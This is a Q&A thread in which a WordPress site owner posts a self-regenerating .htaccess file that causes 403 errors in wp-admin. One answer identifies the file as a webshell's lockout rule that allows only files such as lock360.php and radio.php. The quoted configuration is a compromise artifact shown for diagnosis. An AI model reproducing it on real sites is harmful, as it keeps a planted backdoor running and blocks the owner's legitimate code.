# Corrupt .htaccess file

Tags: htaccess, errors, server

My site was running well last summer. But today when I tried to make updates in the wp-admin section, I got lots of 403 errors on all PHP files: `load-styles, load-scripts, edit.php, media-new.php`, etc... The interesting thing is that the front-end of my site has no problems.

#### Screenshot:

[image: 403 errors in network tab]

1. I've read a few articles suggesting I disable plugins. I tried it, but it does not fix anything.
2. Then I tried deleting my `.htaccess` file, and this does fix the wp-admin section, but it breaks the front-end, and now I get 403 errors on the homepage! It's like I can only get one or the other. After about 5 minutes, Wordpress automatically creates a new `.htaccess` file, and we're back to square one.

What permissions and settings should I set on `.htaccess` so I can run both my front-end and wp-admin sections without 403 Forbidden errors? This is what it looks like now:

```
<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
```

Comment: Is that the _exact_ `.htaccess` file you have (that is "automatically created")? Are there no `# BEGIN WordPress` comment markers etc.?

Comment: @MrWhite Yep, that's the whole thing! All 16 lines of it. I just double-checked, and there are no `# BEGIN` comments anywhere.

Comment: Try removing both `<FilesMatch>` blocks and wrap the `<IfModule>` block in `# BEGIN WordPress` and `# END WordPress` comment markers. What happens? Are these sections regenerated? And specifically, _where_ in the `.htaccess` file are these generated (now that the `# BEGIN/END WordPress` comment markers are in place)?

Comment: how did you fix, this is a malware!

Answer (score 2, accepted):

You appear to be denying access to PHP files, which would explain why you are denied access to PHP files:

```
<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
```

What is the purpose of this?

Comment: I didn't create the `.htaccess` file. It was automatically generated, I presume by some Wordpress script?

Comment: WordPress only creates the `IfModule` section. If you didn’t write the first section then something else is, but not WordPress. You should speak to your host.

Comment: Ah, I see. So ideally, that top line should only read `<FilesMatch ".(py|exe)$">` without the `php`?

Comment: I mean, I don’t really see the purpose of any of it, but yes, php files need to be accessible for WordPress to work.

Comment: @Marquizzo If you remove `php` from the first directive then the 2nd `<FilesMatch>` container is redundant. The 2nd `<FilesMatch>` container is attempting to _override_ the first "generalised" block and allow access to specific `.php` files. eg.  `admin.php` and `wp-login.php` etc. Without this your main site would not work. However, this is not sufficient (as you have demonstrated). If this is auto-generated then it would seem you may have a half-baked security plugin that should probably be _removed_? (This is also using deprecated Apache 2.2 directives; you are probably on Apache 2.4?)

Comment: @MrWhite I checked PHPMyAdmin and it says I'm using `PHP version: 7.3.28` I didn't see any server details though. I've tried removing the `php` from the FilesMatch directive above, and it works great... but only for about 5 minutes. Then the file gets re-written all over again by that pesky plugin. I've got to call Bluehost customer care tomorrow and get to the bottom of it.

Answer (score 0):

This is caused by **webshell**, your **wordpress** must have some of these **lock360.php** or **radio.php** files, it does this so that if someone else sends a shell or some malicious script it doesn't run and only its shell is executed, probably your website is being sold in some dark spam market

recommend you reinstall your wordpress and scan your theme and etc. Also check your google results your site may be being cloaked, check site:yoursite.com

Comment: Another thing, it's not wordpress that creates the htaccess file, there must be some file running in the background overwriting the htaccess, I recommend you look at your index.php too, there may be malicious code in it